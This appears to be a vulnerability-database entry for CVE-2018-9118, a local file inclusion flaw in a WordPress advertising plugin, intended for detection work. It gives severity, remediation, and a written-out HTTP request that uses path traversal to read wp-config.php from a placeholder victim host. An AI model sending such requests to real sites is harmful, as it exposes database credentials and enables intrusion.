🔙 목록으로 돌아가기

CVE-2018-9118: WordPress 99 Robots WP Background Takeover Advertisements <=4.1.4 - Local File Inclusion

TitleWordPress 99 Robots WP Background Takeover Advertisements <=4.1.4 - Local File Inclusion
Author0x_Akoko
SeverityHigh
ImpactThis vulnerability can lead to unauthorized access to sensitive files on the server, potentially exposing sensitive information or allowing for further exploitation.
RemediationUpgrade to 4.1.15.
CVSS Score7.5
EPSS Score0.71307
CVE IDCVE-2018-9118
CWE IDCWE-22
Tags cve2018 cve edb wordpress wp-plugin lfi traversal wp 99robots vkev vuln

🔍 Vulnerability Description

WordPress 99 Robots WP Background Takeover Advertisements 4.1.4 is susceptible to local file inclusion via exports/download.php.

🌐 HTTP Request

GET /wp-content/plugins/wpsite-background-takeover/exports/download.php?filename=../../../../wp-config.php HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.10 Safari/605.1.15
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2018/CVE-2018-9118.yaml

🦈 Packet Capture: ⬇️ Download cve-2018-9118.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A